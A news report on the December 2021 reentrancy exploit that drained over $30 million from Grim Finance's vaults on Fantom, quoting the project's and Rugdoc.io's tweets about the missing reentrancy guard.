DeFi project Grim Finance has become the latest victim in the crypto space after being hit by an ‘advanced attack’. The attack resulted in Grim Finance losing over $30 million in crypto tokens.
Hello Grim Community,
It is with heavy hearts that we inform you that our platform was exploited today by an external attacker roughly 6 hours ago. The attackers address has been identified with over 30 million dollars worth of theft here https://t.co/qA3iBTSepb
— Grim Finance (@financegrim) December 19, 2021
Built on Fantom Opera Blockchain, Grim Finance allows users to deposit liquidity provider tokens they receive from decentralized exchanges and generate more profit from them. Fantom Opera Blockchain is a smart contracts platform compatible with the Ethereum chain and uses its programming language “Solidity”.
Grim Finance has temporarily suspended all its vaults to avoid further attacks and has called on users to withdraw their funds immediately. “The exploit was found in the vault contract so all of the vaults and deposited funds are currently at risk,” the protocol tweeted Sunday. It further noted:
“We have contacted and notified Circle (USDC), DAI, and AnySwap regarding the attacker address to potentially freeze any further fund transfers.”
According to reports, the attacker used a re-entrance loophole to deceive the protocol by adding fake additional deposits into a vault while the transaction was still in process. DeFi monitoring group “Rugdoc.io” pointed out that Grim Finance should have a guard function to prevent re-entrance attacks.
1) The culprit? A before-after pattern without reentrancy guard. This is a big no-no.
Read the following posts for the full explanation. pic.twitter.com/y4aPkLJHfU
— Rugdoc.io (@RugDocIO) December 18, 2021
“‘Hopefully all projects can draw lessons from this incident that there is much knowledge most experienced solidity devs have at hand. If you haven’t acquired this yet, don’t build multi-million dollar projects. Don’t get audits from companies which everyone knows are useless,” Rugdoc.io tweeted.